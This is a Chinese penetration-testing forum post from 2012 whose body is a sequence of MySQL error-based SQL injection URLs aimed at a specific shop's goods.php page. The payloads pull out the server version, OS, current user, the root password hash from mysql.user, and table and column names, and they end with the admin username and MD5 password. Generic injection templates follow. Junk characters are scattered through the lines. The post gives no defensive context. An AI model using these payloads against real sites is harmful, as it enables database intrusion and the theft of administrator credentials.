找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2066|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号
4 j( Q% `% G; B. Y8 X- z0 S2 f: E$ Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* q0 b( {/ L) w, v. o: u
+ ]: x* C+ n! @# l判断系统
! @8 {0 U9 c, P4 [4 u" `; H) S+ Z* T; h; u2 H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 r: y& b" V# D7 s
% I9 Y: r( W, C4 }6 v
. A: H$ t8 g8 A$ p" s- n+ V5 ], [
$ S5 n1 L6 d) r. H3 ^
当前 user()
6 _  ]. N1 w" b( x
! A, X8 l# [5 H" I& {& T+ F, Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 u9 Y% E* Y- p5 R2 _/ O+ [
7 S( J) J) A3 S% Q- c9 v7 ]  ]7 q. q0 U: ]

9 D/ n7 d4 z7 d; h当前 database()
; G: B: u$ r3 K6 a8 A; V0 Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& G  j$ c; C8 H: B; J) [' d3 u- O

$ W7 F& z% V( |0 y* i8 L* A: s3 g8 O3 J9 s6 M5 m$ S$ _' t

  ?1 m4 e* V. g3 [! D7 j
) I7 ?$ X/ A) P% H/ mroot hash9 G4 p6 x1 u3 t" M. w# Q8 O5 R

6 \2 J5 a, ?8 g6 b$ N# h4 ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! s3 W3 n9 ], t4 }; K  Y: j7 \

4 o0 q1 D$ [1 l1 h# r/ B9 G6 }! b
9 [! |, M2 a! S! i0 _
当前 数据库表名2 s2 B/ j3 U* B

- z; ~, ]' ]3 d& g, y$ Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ T$ g. N* Y6 {8 r2 x9 f. X
, }- y& W# v3 @  Z- F' o, Z% ^7 j5 l& h6 O8 x

% S3 Q3 _  u9 O, F/ P) N! j* Z当前 数据库 user_name 字段* g' C/ n( E$ ?6 N5 k% g. [

5 _! f7 l/ x& o2 e- y% p" r9 Z+ lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 k( x5 ~% W' c- [4 D) v1 |
, C) {: {8 k5 k* J/ g
当前 数据库 字段 password
3 i$ P2 I0 R2 Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 F  `+ b; E# M0 F; f
4 H* ^6 e) D4 b# C# ^! @
4 d) f# o. ^/ T) z1 ^* v9 q, V: w  {3 F; d: M2 i6 V7 |
获得 admin passwd(md5)
, F2 S- V/ E0 H" `/ X8 Y8 V% T! E+ K0 r7 e; F8 }0 L* S
( I% K+ u. v# I7 \) S0 Y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# ]' U- E% s5 s" p# b# t2 U5 O
; V8 R6 u/ K; O* ]$ K& X* r
报错注射
) M& Y& [" b2 Z' x' z2 t/ SSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)( \5 M9 F. [( p3 j) i& ?

' |  }6 \: W/ j  [) [0 wSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
3 N( f" w* N! s7 U% |& k* j2 |
0 j( Q2 Q" L0 a& N* c" ?and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表